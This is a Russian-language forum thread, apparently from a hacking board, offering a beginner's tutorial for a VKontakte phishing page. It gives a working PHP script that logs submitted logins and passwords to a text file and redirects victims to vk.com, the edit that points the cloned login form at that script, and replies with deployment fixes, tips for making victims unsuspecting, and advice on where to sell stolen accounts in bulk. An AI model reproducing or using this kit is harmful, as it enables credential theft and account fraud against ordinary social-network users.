Самый просто фишинг для начинающих!

Внимание!!!
Этот способ просто баян,
но все же я опубликовал
тему для начинающих.

И так для начала разберёмся что такое фишинг. Цитирую
"Фишинг — это когда всеми возможными правдами и неправдами у вас пытаются узнать различные персональные данные (пароли, логины, номера банковских карт и счетов). Смысл заключается в том, чтобы побудить вас перейти по фишинговый ссылке на фишинговую страницу, где под различными предлогами выудить персональную информацию."

И сегодня мы создадим фишинговую страницу. Создавать мы её будем для социальной сети вконтакте.
1. Переходим на http://vk.com/.
2. Жмем правой кнопкой мыши на страницу -> Сохранить как.
3. Создаём файл Login.php.
5. Запишем в файл этот скрипт:
<?PHP
$Log = $_POST['email'];//получаем логин
$Pass = $_POST['pass'];//получаем пароль
$log = fopen("passwords.txt","at");
fwrite($log,"\n $Log:$Pass \n");//записываем их в файл
fclose($log);
echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://vk.com'></head></html>"; // перенаправляем на вк
?>

6. Открываем html файл который мы сохранили в текстовом редакторе и ищем строчку
<form method="POST" name="login" id="quick_login_form" action="https://login.vk.com/?act=login">
Нужно заменить её на
<form method="POST" name="login" id="quick_login_form" action="Login.php">
Т.Е мы подключили php скрипт для получения формы авторизации.
Дело осталось за малым, залить всё это на хостинг с поддержкой php.
После создания страницы в дело вступает СИ.

подойдет для любого сайта я так понял?

да

Дополнить нужно скрипт: не просто редирект на вк, а отправка данных введённых в форму. Тогда лох сразу после ввода данных авторизуется в вк и у него даже тени сомнений не возникает.

Дополню. Создаём файл passwords.txt и после заливки на хостинг выставляем ему права на запись. А то народ просто твою форму начнёт заливать и нифига у него пароли не будут записываться )). Когда я так делал я php не знал ) 60$ платил за то, чтобы мне "починили" скрипт.

Разницы особой нет, и так и так происходит редирект на вк.
Если точечно работать, конечно лучше включать проверку авторизации, но при большом трафе скрипт проверки перестает работать (вк банит на время ip) и его всё-равно приходится отключать.

Polezno,spasibo

То есть если я правильно понял, пользователь которому скинуть эту ссылку пройдет по ней, и я могу получить его логин и пасс?

Ты получаешь логин и пароль, если жертва перешла по твоей ссылке и, ничего не подозревая, ввела их в соответствующие поля.

А куда потом можно продать аккаунты?где сразу пачку возьмут?

Можно поднять свой магаз, если есть стабильный поток акков, например через deer.io. Можно продать оптом перекупам, но они возьмут дешевле. Или искать клиентов размещая темы о продаже на форумах, типа этого.

Не знал что так возможно, спасибо огромное. Щас будем тестить

на всех хостингах выбивает такую шляпу.

Может кому и пригодится, но он рили баян.

А не легче SET'ом? Там есть функция копирования страницы логина, все быстро и просто.

Либо прав нет на запись или не находит файл, или путь ееверный.

Баян, не баян. Главное здесь работоспособность.

Однажды я наткнулся на такую страницу, благо открыты глаза. Понял все по адресной строке)) И вместо полей логин/пасс написал какой же он "аххуенный хакер" раза тридцать наверное. Знаю что идут логи, и ну он походу загрустил когда прочитал)) с полными лохами сработает конечно, а так баян еще тот

Схема старая, но действительно еще рабочая. Можно выжать еще соки. Если язык хорошо подвешен, то не составит труда

Спасибо

Актуально ?